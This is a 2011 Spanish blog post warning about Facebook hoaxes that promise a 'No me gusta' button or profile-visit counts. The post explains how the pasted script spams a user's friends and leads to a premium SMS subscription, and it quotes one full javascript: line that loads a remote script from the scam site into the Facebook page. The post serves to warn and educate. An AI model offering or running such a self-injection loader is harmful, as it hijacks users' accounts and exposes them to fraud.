lunes, 16 de mayo de 2011

SPAM-Hoax-Scam: Botón No Me Gusta y Visitas al Perfil

Hay varios nuevos Hoax (timos) en Facebook, relacionados con el botón "No me gusta" y los contadores de visitas al perfil.

Facebook se niega a informar de las visitas y ha incluir el botón No me gusta
Como ya hemos comentado en otras ocasiones, Facebook ya se ha encargado de que no se pueda saber las personas que visitan un perfil (como se comentó en el artículo "Contadores de visita en Facebook"), ya que esto va contra su política (¿pero Facebook tiene alguna política? Pues parece que sí, pero en ningún caso pretende favorecer a los usuarios, sino vender sus datos al mejor postor y dentro de esta política, no cabe la posibilidad de que los usuarios sepan los usuarios que visitan su perfil).

Con respecto al botón, "No me gusta", Facebook ha indicado que dicho botón tienen muchas connotaciones contraproducentes y no es sencillo de interpretar, de modo que no va a implementarlo bajo ningún concepto. Además, sería contraproducente para Facebook que se pudiera poner el "No me gusta" a cualquier tipo de contenido, Marcas, etc... ya que podrían perder un buen filón, ya que las marcas, solamente reciben "Me gusta". ¿Qué pasaría que permitiera poner el "No me gusta" a una marca, publicidad, etc...? Pues que, directamente, podrían perder muchos ingresos (por publicidad) de las marcas peor valoradas.

¿Por qué tanto interés en que se pulse en el "Me gusta"?
El tema es muy sencillo, al margen de que al pinchar en el "Me gusta" se crea un enlace en tu perfil que hace que tus amigos vuelvan a caer en el timo y de que se infle ficticiamente la cantidad de usuarios de la página. Se consigue que dichas páginas aparezcan mejor posicionados en los buscadores de Facebook y Bing, tal y como se indica en los artículos "El buscador de Facebook se basará en la cantidad de "Me gusta"" y "Bing también usará los "Me gusta" de Facebook", lo hace que algunas empresas de SEO sin escrúpulos lo utilicen para engañar a sus clientes, ya que a pesar de posicionar las páginas en los buscadores, consiguen que la página se clasifique como SPAM, Hoax, etc... incluso antes de nacer.

Aclarado que Facebook no está por la labor.
Una vez aclarado que Facebook no está por la labor de implementar estos mecanismos y mucho menos facilitarlos a desarrolladores independientes los mecanismos necesarios, vamos a ver los nuevos ataques detectados. En esta ocasión, en vez de hacer que concedas permiso a una aplicación para que pueda hacer lo que quiera, te pide que pegues una línea en tu navegador, que hace que seas tu quien haga SPAM a todos tus amigos sin las limitaciones propias de las aplicaciones de Facebook.

Visitas al perfil (http://facebookescaner.com)
Este caso aparece en el perfil de todos tus amigos con el mensaje:
Dios mio! No puedo creer que estuviera 59 horas en el Facebook este mes, y parece que 253 personas han visto mi perfil. Clicka el texto en azul de abajo que pone 'Escanear mi perfil' si quieres saber cuantas horas estubiste y lo popular que eres TU.
Las cantidades, se modifican manualmente por el programador de la web y son datos estáticos, es decir, a todos los que entren en el mismo momento les pone los mismos valores. La página en cuestión tiene la siguiente apariencia
El "texto" que te pide que copies, es una aplicación JavaScript, o lo que es lo mismo un pequeño programa que se va a ejecutar sobre el perfil de Facebook. Dicho JavaScript, realmente lo que hace es cargar otro Script mucho más complejo y que no hace nada de lo indicado.
Para los que no tengan mucha idea al respecto, en el código JavaScript de la imagen lo que se hace es:
  1. En la línea 1 (y antes de hacer cualquier cosa) se indica cual es el mensaje que se va a poner en el perfil de todos tus amigos.
  2. Luego, en las líneas de la 9 a la 18, recoge una lista con todos tus amigos.
  3. En las líneas 19 a 39, se encarga de mandar el mensajito de marras a todos tus amigos.
  4. En la línea 42 te indica que tienes que seguir los pasos para recibir la información.
  5. Por último, te reenvía a otra web en la que te darás de alta en un servicio de pago por recepción de SMS, en el que, con solo introducir tu número de teléfono te habrás suscrito. Las condiciones de este servicio son un precio de 1,42€ por cada SMS y no te envían más de 10 SMS a la semana, o lo que es lo mismo 56€ al mes por cada persona que pique.

Además, promociona dos páginas de Facebook (Advertencia y Sugerencias), que actualmente aparecen en blanco, pero de cuyo futuro contenido no me fío mucho. Abajo tenéis los "Me gusta" en marrón/naranja, por si deseáis eliminarlo de la lista de páginas que os gusta.

De todos modos, ante lo escandaloso del asunto, supongo que Facebook no tardará en eliminarlas, en cuyo caso, os pueden aparecer cosas extrañas.

Advertencias
Sugerencias

No Me Gusta (http://www.botonnomegusta.es)
Este caso aparece en el perfil de todos tus amigos con el mensaje:
Que bien, Facebook ha puesto por fin el boton NO ME GUSTA, si quieres tenerlo tu tambien pulsa en el boton que sale aqui abajo, que dice Instalar NO ME GUSTA.
Este mensaje puede variar, pero sea cual sea su construcción, debéis saber que no es posible poner el botón "No Me Gusta" y que si Facebook en algún momento decide ponerlo será porque le interesa y lo pondrá para todos.
En este caso al pulsar en "Copiar", se copia un JavaScript al portapapeles, que al pegarlo en el navegador y ejecutarlo llama a otro Script, como el de la imagen. Como podréis comprobar son prácticamente idénticos, salvo en las direcciones a la que te envía, el mensaje en cuestión y poco más.

¿Cómo podéis obtener estos Scripts?
Sí queréis ver los Scripts que se van a lanzar realmente, debéis de coger el texto que os han pedido que peguéis en el navegador y pegarlo en un editor de texto plano y obtendréis algo como esto:
javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://botonnomegusta.es/nomegusta.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();
Lo que hace este Script es insertar un programa (Script) dentro de la página de Facebook en la que estamos. Dicha página, en este caso, aparece como botonnomegusta.es/nomegusta.js. Si pones en el navegador view-source:http://botonnomegusta.es/nomegusta.js, podrás ver el código que se va a ejecutar al pegar el texto en el navegador. NO LO EJECUTES SI NO SABES LO QUE HACE.

Comparte este artículo
Si eres de los que se han visto invadidos por los mensajes de tus amigos, si te ha servido la información o conoces alguien a quien le haga falta, comparte el artículo para que las personas que hayan propagado los mensajes puedan tomar las medidas oportunas.